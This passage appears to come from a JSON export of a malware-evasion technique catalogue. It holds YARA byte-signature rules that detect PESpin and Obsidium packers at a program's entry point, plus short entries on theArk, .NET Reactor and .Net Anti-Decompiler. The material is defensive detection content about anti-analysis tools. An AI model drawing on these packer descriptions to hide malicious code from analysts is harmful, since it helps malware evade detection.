EB F8 69 8B 59 38 03 DA 8B 3B 89 BD ?? 4F 40 00 8D 5B 04 8B 1B 89 9D ?? 4F 40 00 E8 00 00 00 00 58 01 68 05 68 BC 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD ?? 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v10_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 D2 42 40 00 8B 42 3C 03 C2 89 85 DC 42 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D F0 42 40 00 53 8F 85 94 41 40 00 BB ?? 00 00 00 B9 8C 0B 00 00 8D BD 80 43 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 40 4E 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 FD 68 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V071_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 80 40 FB EB A2 40 02 00 E0 91 32 68 CB 00 00 00 59 8D BD A3 5D 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V11_cyberbob_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 ?? 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V132_cyberbobnbsp_nbsp_SignByfly_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 17 E6 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D FF E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF E8 02 00 00 00 ?? ?? 5A 81 ?? ?? ?? ?? ?? 83 EA FE 89 95 A9 57 40 00 2B C0 2B C9 83 F1 06 09 85 CB 57 40 00 9C D3 2C 24 80 C1 FB 21 0C 24 50 52 B8 36 C7 09 FF 05 FE 37 F6 00 F7 64 24 08 8D 84 28 B1 35 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC CD 20 BB 69 74 58 0B C1 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13x_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V0b_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 26 E8 01 00 00 00 ?? 5A 33 C9 ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 8B 59 24 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 53 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 0C 5B 6A 17 59 30 0C 03 02 CB 4B 75 F8 40 8D 9D 41 8F 4E 00 50 53 81 2C 24 01 78 0E 00 ?? ?? ?? ?? ?? ?? C3 92 EB 15 68 ?? ?? ?? ?? ?? B9 ?? 08 00 00 ?? ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 1D 01 00 00 59 ?? ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA 68 ?? ?? ?? ?? 50 01 6C 24 04 E8 BD 09 00 00 33 C0 0F 84 C0 08 00 00 ?? ?? ?? ?? ?? ?? 50 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF E0 C3 8D 64 24 04 E8 53 0A 00 00 D7 58 5B 51 C3 F7 F3 32 DA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 81 2C 24 A3 00 00 00 58 ?? ?? ?? ?? ?? ?? 53 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 CD 4E 40 00 8B 42 3C 03 C2 89 85 D7 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D EB 4E 40 00 53 8F 85 E1 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD 90 4F 40 00 8D 5B 04 8B 1B 89 9D 95 4F 40 00 E8 00 00 00 00 58 01 68 05 68 D3 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD C6 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C EB 04 01 EB 0? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_v13_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 CD 4E 40 00 8B 42 3C 03 C2 89 85 D7 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D EB 4E 40 00 53 8F 85 E1 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD 90 4F 40 00 8D 5B 04 8B 1B 89 9D 95 4F 40 00 E8 00 00 00 00 58 01 68 05 68 D3 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD C6 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C EB 04 01 EB 04 CD EB FB 2B C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 79 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 20 2F 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 80 40 FB EB A2 40 02 00 E0 91 32 68 CB 00 00 00 59 8D BD 7E 61 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 49 9C E8 03 00 00 00 EB 04 8D EB FB FF 83 04 24 0C C3 A3 C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 61 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 B2 2F 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC 9A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V07_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 01 ?? 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_by_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v01_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v01_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V132_cyberbob_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 17 E6 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D FF E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF E8 02 00 00 00 ?? ?? 5A 81 ?? ?? ?? ?? ?? 83 EA FE 89 95 A9 57 40 00 2B C0 2B C9 83 F1 06 09 85 CB 57 40 00 9C D3 2C 24 80 C1 FB 21 0C 24 50 52 B8 36 C7 09 FF 05 FE 37 F6 00 F7 64 24 08 8D 84 28 B1 35 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC CD 20 BB 69 74 58 0B C1 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 205,
            "unprotect_id": "U1424",
            "name": "theArk",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Packer tool developed in C/C++. Full implementation of the linker, dynamic decompression and spraying in memory to complete file mapping.",
            "resources": "https://github.com/aaaddress1/theArk",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 204,
            "unprotect_id": "U1423",
            "name": ".Net Reactor",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": ".NET Reactor is used to prevent reverse engineering by adding different protection layers to .NET assemblies. Beside standard obfuscation techniques it includes special features like NecroBit, Virtualization, x86 Code Generation or Anti Tampering.",
            "resources": "https://www.eziriz.com/dotnet_reactor.htm",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 203,
            "unprotect_id": "U1422",
            "name": ".Net Anti-Decompiler",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": ".Net Anti-Decompiler is a protective tool for .Net assemblies. It provides an extra layer of security and compliance to .Net application from reverse engineering.",
            "resources": "https://www.techipick.com/dotnet-anti-decompiler",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 202,
            "unprotect_id": "U1421",
            "name": "Obsidium",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Obsidium is a software protection and licensing system that is designed to protect 32-bit and 64-bit Windows software applications and games from reverse engineering, unauthorized modifications (\"cracking\") and redistribution (\"software piracy\") while providing a licensing system.",
            "resources": "https://www.obsidium.de/home",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 115,
                    "key": "yara_detect_obsidium",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Obsidium",
                    "rule": "rule Obsidium_1337_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1350_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? ?? ?? ?? EB 01 ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 }\r\n        $b = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v10061_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1364_Obsidium_Software_20090428: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 1E EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 02 ?? ?? 64 89 20 EB 01 ?? EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? ?? ?? ?? EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1338_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400_Obsidium_Software_20091005: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 71 49 EB 01 ?? EB 03 ?? ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 01 ?? 64 89 20 EB 02 ?? ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? 58 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 ?? 00 00 00 EB 04 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_10061_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1339_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? 